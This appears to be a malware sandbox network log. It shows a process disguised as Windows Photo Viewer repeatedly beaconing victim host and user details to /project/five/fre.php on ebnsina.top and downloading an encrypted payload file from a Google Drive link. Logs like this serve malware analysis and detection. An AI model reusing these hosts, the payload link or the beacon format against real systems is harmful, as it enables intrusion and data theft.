Apr 3, 2024 06:38:54.573359013 CEST	625	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dXvuLuk%2FtKaaQqwvNNJcTfDNTrOcakR1UN4V7TR6uQuIgwV3ttheCnygu6003z0j5lCzG5pqxdAYwraqNSGgsir8hBv9I3UTIw%2BOxusJ%2B%2FavaieePQOSxMUi4SCONw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65f2bfffa497c-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.4	49853	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:54.842169046 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:54.967072964 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:55.256551027 CEST	623	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7tYtssK7uJq3DXh6zahUCbNETeWjAefKvu0fo9FPN3jUK%2F76CfWo4Wuo7QCJC5S%2Fmgkn4qh85t1rmnYUVRq0iPovOBOzHUkI9cW%2BUGfISqtkwuq2UPZJNJwm8hymmw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65f312a1d7418-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.4	49854	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:55.534564972 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:55.660617113 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:55.956835985 CEST	623	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2QszoxKQCc2b1auJT5434FSGfZkch8mryhCbSOCW7UGbUFunA5RhXrTs23h5kuuLfr6HT84KibG8LLtZ%2B66%2BY0tIAZCoqNzSMpzuGZncETy1L%2BugmtJ5JrnrAWge5A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65f357c9e221a-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.4	49855	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:56.219175100 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:56.343656063 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:56.647528887 CEST	629	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EbOrgyQagV%2FFk4O%2F%2BuRXffHv0MgUkmEayToTQkHPhd9Yl5GjtTveMtnE9Ldm5CW2PnktIIaDZ2pxQKPvGs%2BgJY7bFsDWhrDJiDfrVeaN%2Bna4dCliMSe%2B4zHjFRey8Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65f39cafcdad1-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.4	49856	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:56.921190023 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:57.046123981 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:57.483875036 CEST	623	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FHys8cOvye1zpW0pM3UBsVO9ARVWUIxG9y10qWopuPGzEYEYzZ1kdIz8w4cmo99R%2FreiwwqiDWL6PGNa7CXyGljHdWHYhJ8vkA%2FCgwNbaMMiYTl8v2uOZBschIq9nA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65f3e29318756-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	192.178.50.78	443	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-03 04:37:20 UTC	216	OUT	GET /uc?export=download&id=13d3vSnnnSqPQHvAKGjzAcgNiA-IC-wI7 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache
2024-04-03 04:37:20 UTC	1582	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 03 Apr 2024 04:37:20 GMT Location: https://drive.usercontent.google.com/download?id=13d3vSnnnSqPQHvAKGjzAcgNiA-IC-wI7&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factor=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce--2ePXebZlAHV0YzIB2WXyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	192.178.50.65	443	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-03 04:37:20 UTC	258	OUT	GET /download?id=13d3vSnnnSqPQHvAKGjzAcgNiA-IC-wI7&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-04-03 04:37:22 UTC	4687	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ABPtcPqXfWetp2Ew9wwGNKIrLIAlZE4lxrVpBqerGiSsdzGuguBrAC8tyFjwNAxnEaJhRMzy3gwyuLwdRA Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="nvHROS244.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 106560 Last-Modified: Wed, 03 Apr 2024 00:01:21 GMT Date: Wed, 03 Apr 2024 04:37:21 GMT Expires: Wed, 03 Apr 2024 04:37:21 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=5kKkfw== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-03 04:37:22 UTC	4687	IN	Data Raw: ae 6c 8e df c4 15 18 91 39 bb 0e 25 80 24 9f 60 ad 0c 30 01 94 18 04 b0 df 2b ee 9b 1a f4 7d 08 c5 0d 10 d9 28 56 f9 41 06 45 a3 c6 77 a0 71 d5 8f 4d 38 de bd 85 cb fb f1 6f 92 e5 c0 84 ff 2a c1 bf 6b 86 78 e6 27 e5 f0 94 a9 31 81 e9 17 b4 01 e3 bc d6 dd fa 69 d6 d5 00 89 2e fc f4 26 ea f4 ea f4 a0 e4 e7 20 9d f3 e3 62 02 57 37 a8 43 ff 7b 62 70 14 d8 cd 4b eb 0d f7 bc 78 71 a7 72 80 fc 84 be c3 26 7b 95 ac 8f 3c 80 05 b4 bc d0 a6 d7 a9 54 7d 4f a1 f1 28 ce 59 47 e9 e6 e2 57 06 f9 36 7f e3 26 04 f6 26 db d1 fb 99 27 a9 27 58 21 b1 1b 8a 8d f9 3e 0f c5 5e 2e dc ae 80 2f e5 61 25 2a eb ca 06 9e 72 14 3c 0e fd d5 49 57 dd 92 3f a9 25 f1 89 bf 90 07 6e 64 14 cb d8 05 72 57 3b d5 93 e9 cc 89 d3 73 7f 7f 93 b1 e7 74 8c a3 95 c0 fb 15 d0 7f 65 5a 00 6e b6 06 ef Data Ascii: l9%$`0+}(VAEwqM8okx'1i.& bW7C{bpKxqr&{<T}O(YGW6&&''X!>^./a%r<IW?%ndrW;steZn
2024-04-03 04:37:22 UTC	4687	IN	Data Raw: 4a ae 2f 91 be ff e9 ae 5b cd 7f 19 a4 cc d8 ce a3 74 62 d0 d4 d8 56 dc 34 66 93 9f 34 f9 b9 65 ff ed c3 6b 47 c8 0d 13 8b 2a b1 1c e1 ad 8b 63 7d 9c 03 a3 4b 49 6b 2b 67 bf df 6d 7b da 9f 20 47 9a 00 35 8b b0 ff e4 b2 4c 1b 3e 71 75 60 51 32 16 fb b8 eb e7 86 01 d4 d8 29 01 b9 6f 0a ce 2d 44 37 0c d2 8e b9 6f f0 3a 8f d6 87 1d cc 24 e2 70 b7 ac d8 ea aa dc ce 5f 7c 99 35 79 6c d3 5f 87 59 88 4d f1 dd b5 0c b9 6a 67 99 18 2a d7 b5 fb 64 7d 4a 58 f2 21 71 2c 3a d0 e8 6e f1 33 10 3c 75 5d 1c 6a c4 9a 2e 62 df a3 50 25 2b b7 1e d5 e0 28 8c a0 cb e4 f0 df 49 33 94 59 ff d7 51 62 df 48 2d f3 ff f7 7b 10 35 1a bf 04 8c 96 75 32 84 c4 61 fd 0a d2 57 55 50 d6 f1 e3 2f 81 ae 7f 8e 41 5d e6 b3 b2 f4 4c 83 fa 4b b9 af 9d 64 46 86 1b 72 82 88 c8 0b 4c 2f 96 c7 c1 c8 Data Ascii: J/[tbV4f4ekGc}KIk+gm{ G5L>qu`Q2)o-D7o:$p_\|5yl_YMjgd}JX!q,:n3<u]j.bP%+(I3YQbH-{5u2aWUP/A]LKdFrL/
2024-04-03 04:37:22 UTC	636	IN	Data Raw: be aa 3a 14 fc 36 76 7a 3a ab fe 0a 60 24 ba c1 75 07 59 a0 4d d2 d3 81 30 47 0c ab 74 75 3f 27 2b 2f 1c 5c 63 c7 7b 51 51 6d 77 23 3c 8d 72 a2 65 33 4c af f6 48 17 93 5d b1 3d 6c 56 9a 96 db 2c f7 32 85 0d 48 9a 74 92 a2 7e b1 02 ea e6 55 47 d0 a5 99 3f ab a7 a2 31 a7 5b ec 16 61 03 0d 08 ac 1b ec 56 7e 36 50 b8 19 00 e7 c0 c1 cc b8 b4 f6 b2 ea ac 8c 07 76 d7 74 55 17 91 a2 f4 8d 6f 91 0a bc 9e 72 21 45 f4 1a d1 26 5f da 50 39 2a 7e db 91 7a 2d 7e 54 d0 af e2 e4 aa fb cf 95 e0 56 c1 f6 ae 0f fb d6 05 4e 1a 95 02 fc 05 45 c6 c8 79 81 01 35 cc dc 73 ea db 7b 02 b5 23 01 04 84 c2 03 31 9e fb e0 11 cc b5 2f 9f 0a ad 56 03 91 68 a2 43 c6 a4 b7 cf f3 f3 bd b6 b8 5f c7 4c 65 96 ee cf 7e 71 41 d3 87 2b cb cb 05 02 ae c2 93 8d 97 01 5e f2 ca f7 a6 8f db cb 2c aa Data Ascii: :6vz:`$uYM0Gtu?'+/\c{QQmw#<re3LH]=lV,2Ht~UG?1[aV~6PvtUor!E&_P9*~z-~TVNEy5s{#1/VhC_Le~qA+^,
2024-04-03 04:37:22 UTC	1252	IN	Data Raw: bf 75 64 d2 8f 91 1d 79 fa 45 64 77 0f a3 e0 36 55 e9 b4 47 35 be 3b e3 56 59 a9 d9 79 9d de e2 ac 31 82 b7 8d 85 bd c2 f1 45 12 3e 42 0c 76 06 a3 6e f8 62 e2 78 b5 01 65 60 d4 26 54 27 a3 e0 71 10 b2 bd a1 01 62 bb c6 38 f5 45 e0 1d bf cc 76 5e d8 54 c9 20 80 82 12 ca 72 e3 09 18 3d 5f 4a be 77 e1 c7 6e c7 a0 b1 89 23 57 f2 02 2c 55 ff f4 e1 0b 25 78 b2 95 94 2f 24 0e a0 f6 52 1b 8a 52 e0 cf 29 4e 5a 86 de a1 0f 2d 50 01 86 9c f6 64 8a 9e 2a 7f 90 17 21 9c fe 7c ba 58 a8 5f d5 e3 9a 94 64 7d 8f 96 f8 41 a8 6a b7 ae 69 d0 ed f4 a7 13 2b 85 bc 85 20 40 db f3 b2 fd 4b fc ad 12 2e 01 89 aa 30 c5 7b eb b3 0f ae 83 ea 0f 98 9a b8 61 79 10 ad 64 ce f6 ff 53 8f 82 14 f1 45 c7 0e 8d a0 0b 0d 86 88 f2 0b d1 b3 4c 43 a7 75 0e 3e ea b8 2b 20 7a 5e 08 4f 8c 81 d3 4d Data Ascii: udyEdw6UG5;VYy1E>Bvnbxe`&T'qb8Ev^T r=_Jwn#W,U%x/$RR)NZ-Pd*!\|X_d}Aji+ @K.0{aydSELCu>+ z^OM
2024-04-03 04:37:22 UTC	72	IN	Data Raw: 5b 63 f9 da cd 09 c5 c4 cc 5c 55 21 51 31 6a 08 97 ba d2 f2 a8 9a 23 11 6d a4 e3 04 84 4d 5c aa b6 f1 42 9c 56 19 62 bd 81 4a db 97 64 22 28 a9 4d 76 0e df c0 cc c1 f8 8c 5f 0d 4b c4 38 35 69 b2 57 f5 dd 39 62 c6 94 Data Ascii: [c\U!Q1j#mM\BVbJd"(Mv_K85iW9b
2024-04-03 04:37:22 UTC	1252	IN	Data Raw: a5 23 fc 6c bd f9 b3 0a 78 77 f1 66 9c 6c 1a 39 18 9a 8d f0 e3 d8 56 1e 5b ae 75 59 d1 c3 65 fe 0b 48 89 e3 b9 9a 5f 8d fc ec de c7 73 55 fe 2f e9 03 b5 5f 9c 3b 7f d8 51 ce 59 2d 6e b8 cc 1c 54 f0 c7 fa 5e 1b 95 3c b5 a0 9b 6b c8 03 7e 30 72 db 36 c9 7d c9 ce 4d 6e 31 95 d3 f7 50 2a 81 64 9e f1 86 c1 41 53 b0 ba bb 3d b3 25 85 5d 8c a8 9e 91 56 14 3f b0 54 75 8a 1f 2e 03 37 a8 4a 94 b7 21 87 ac 99 5f 5b ef 4d 93 fd 5b d6 b2 64 0a 9f 17 de 76 be 73 a1 40 ef df e9 cc 5e 1c 39 34 07 ea 42 bb 7a 8e f7 83 47 ad 02 fe 77 05 f7 ce 6b 3e 1f 0b 5b 0c 19 0a be c7 50 38 85 98 3d e3 c6 b4 23 69 d4 5b 1e 99 5a 4b 56 42 fb 25 9d 0e f8 03 97 59 df 7c a3 47 da 95 af 3f 89 8f 37 59 08 ad 42 eb 56 ce a4 59 0c 77 a4 78 07 c5 16 29 17 bd 64 60 97 22 fa 2a a8 80 79 02 4b 6f Data Ascii: #lxwfl9V[uYeH_sU/_;QY-nT^<k~0r6}Mn1PdAS=%]V?Tu.7J!_[M[dvs@^94BzGwk>[P8=#i[ZKVB%Y\|G?7YBVYwx)d`"yKo
2024-04-03 04:37:22 UTC	1252	IN	Data Raw: 41 ac c3 ff 50 53 31 7b bf 58 63 37 ac 25 e9 0a 0a 48 93 06 8b d5 c0 49 f5 ef 39 0e 6f 73 a6 5b 9e 1c 3f 94 1a 2e 9c 09 26 5d 12 fb 13 8a 03 bc 22 03 aa 0c 98 77 e3 fe 0d 2f a7 9e 88 eb 75 a6 aa 6f 56 b1 32 28 fc 66 77 e1 c4 65 dc 0c 8f af ef 82 51 05 d9 0e 57 af 12 4d 88 b5 af 77 ee 8b 24 d9 2a 07 49 8a 43 be 82 4a db 16 e5 1d 93 29 7e 88 1a 02 32 78 57 c9 81 da 00 86 57 93 ba 73 d5 84 e1 9e d7 4e 21 65 5f e4 ee c8 64 f5 6c b0 44 f6 ee af 61 f2 45 55 22 23 3a 8f d3 0a 2d 69 ea aa d7 b0 71 f9 b7 02 fd 76 5c b2 ee 8a 8d 0a 16 a8 1d 78 e8 63 64 e4 f7 bf 0c a4 a1 f5 4c a3 be 7c 6b ba 9d d9 a1 24 5f df 5e 09 5a 17 3d db 3b 1d d6 32 40 c5 48 95 d5 21 9d 88 04 3f f9 0c fd 83 61 37 86 7b e6 d1 60 44 69 56 ce 6e 19 93 23 b9 e3 bc 55 a0 e6 69 a2 bb 8d 0c f2 01 0b Data Ascii: APS1{Xc7%HI9os[?.&]"w/uoV2(fweQWMw$*ICJ)~2xWWsN!e_dlDaEU"#:-iqv\xcdL\|k$_^Z=;2@H!?a7{`DiVn#Ui
2024-04-03 04:37:22 UTC	1252	IN	Data Raw: e2 14 6e 31 4d 1b 76 39 5a 3c cb 8c 30 c5 18 5c 52 fb 93 0b 88 3a d8 29 24 8c 66 38 1e bb dd cd 54 c7 e3 7c ec 0e 62 e4 cd c0 8d 04 d3 e0 33 d1 a8 92 79 36 f9 f4 a6 22 76 5e 84 81 20 d3 c5 ce 83 e6 39 79 27 da 62 1d 35 de 70 0c 76 eb 05 4a ed f4 9d d2 73 f7 5a 0c 21 7c 65 0d 00 02 a9 bc bc c5 c7 b9 32 2b 1c a7 02 d2 f8 61 0b 43 1c af 4d 77 af 8f 24 81 a1 cc b6 ab 39 23 5c ac 47 41 86 6c a5 07 61 28 0f 6f ab e0 f6 3c 13 b3 da 62 6a 22 82 21 bb eb f6 fd d4 00 c9 58 ee 7b b6 6c 80 c7 b1 cd a7 76 88 a2 ee c9 74 99 3e 05 26 b2 a4 6d f7 be 8d 40 be 46 d3 e8 cd e3 94 27 f0 62 14 7e ba ed c2 3f cd a5 d0 bc 15 f9 81 35 b3 d2 c8 3f fd 3e a6 a5 04 b4 c1 8b 5e 81 a4 7b c5 7b 03 6e ba 3c 10 9d 50 49 b2 12 53 e9 78 53 58 3c 5f 4c 7f e6 4e 4d d9 78 25 30 c9 88 19 b3 9f Data Ascii: n1Mv9Z<0\R:)$f8T\|b3y6"v^ 9y'b5pvJsZ!\|e2+aCMw$9#\GAla(o<bj"!X{lvt>&m@F'b~?5?>^{{n<PISxSX<_LNMx%0
2024-04-03 04:37:22 UTC	1252	IN	Data Raw: eb 56 73 bb 86 54 75 dc 1f 2e ff 9e 2f fc 0d 86 8b f3 c3 0e 05 86 cc 2d 15 c9 e5 8e 07 e8 14 a1 e7 77 61 a5 8c 5e bf 46 3e 30 a3 75 9d 02 e5 a9 60 9e d6 35 7e 8c f8 cc 55 5b f0 f4 89 b8 4b fe 4a 61 7d 26 c8 e6 59 ea 23 7f 83 27 6b e3 f8 6d 0d 6d 8d 41 a4 f5 5e d6 ce a0 60 03 a3 f0 49 73 ad 02 00 07 44 89 11 7e bd 90 82 7d 9e 4b db 83 69 26 68 cb 53 18 36 86 74 93 bb 38 4e 92 85 9f 9e c7 02 c8 9d e1 e1 bf a5 cd fd 39 a9 3c bb 18 e6 c0 cb 57 4c 2a 22 4d 9a 12 c4 b8 4c dd 42 11 1c 53 c1 31 e3 64 6d 7a 5e 38 0f 70 17 52 dc ff ba a3 60 6a b7 3c d2 3f b0 23 e4 28 6c 62 40 34 8b e8 34 cf 57 f8 7f 30 a9 79 ad 71 77 50 1c 4f 82 77 7f c1 fb 77 39 ba ce 73 10 92 a1 06 85 e6 bf de 46 1a 83 da d2 bf e1 99 37 41 d2 0f 79 83 8e 07 63 8d 4b ce 1c d7 d7 69 e5 32 8c e4 49 Data Ascii: VsTu./-wa^F>0u`5~U[KJa}&Y#'kmmA^`IsD~}Ki&hS6t8N9<WL*"MLBS1dmz^8pR`j<?#(lb@44W0yqwPOww9sF7AycKi2I
